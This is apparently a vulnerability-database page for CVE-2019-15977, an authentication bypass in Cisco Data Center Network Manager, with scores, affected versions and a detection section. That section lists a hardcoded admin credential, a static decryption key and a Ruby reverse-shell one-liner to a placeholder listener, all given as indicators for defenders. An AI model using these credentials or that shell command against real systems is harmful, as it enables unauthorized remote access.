cbcvebase.
CVE-2019-15977
published 2020-01-06

CVE-2019-15977: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass…

PriorityP276high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
38.11%
98.4th percentile
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

Affected

3 ranges
VendorProductVersion rangeFixed in
ciscocisco_data_center_network_manager>= unspecified < n/an/a
ciscodata_center_network_manager< 11.3\(1\)11.3\(1\)
ciscodata_center_network_manager

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://<target>/serverinfo/HtmlAdaptor?action=displayServerInfos
urlhttps://<target>/j_spring_security_check
urlhttps://<target>/rest/fabrics
cookieJSESSIONID
cookieresttoken
otherjaas is the way
otheradmin:nbv_12345
command{ruby,-rsocket,-e'c=TCPSocket.new("<ls>","<lp>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print(io.read)}end'}
snort
SID 52530 - 52547
  • Monitor for unauthenticated HTTP GET requests to /serverinfo/HtmlAdaptor?action=displayServerInfos using HTTP Basic Auth with hardcoded credentials (admin:nbv_12345); this endpoint leaks DB credentials, VFS paths, and SFTP credentials used to bypass authentication.
  • The exploit decrypts leaked passwords using Blowfish ECB with the static key 'jaas is the way'; presence of this key in memory or network traffic is a strong indicator of exploitation activity against DCNM.
  • Alert on Set-Cookie headers from DCNM containing both JSESSIONID (56-char) and resttoken patterns in the same response, indicating successful authentication bypass and session establishment.
  • CVE-2019-15977 is classified under CWE-798 (Use of Hard-coded Credentials); hunt for use of the static credential pair admin/nbv_12345 against DCNM management interfaces.
  • ·The exploit was tested specifically against Cisco DCNM 11.2.1 ISO Virtual Appliance (VMware, KVM, Bare-metal); the hardcoded credential and Blowfish key behavior may differ across other DCNM versions.
  • ·There are no workarounds available for these vulnerabilities; only applying Cisco's released software updates fully remediates CVE-2019-15977.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:C/I:N/A:N
vendor_cisco9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.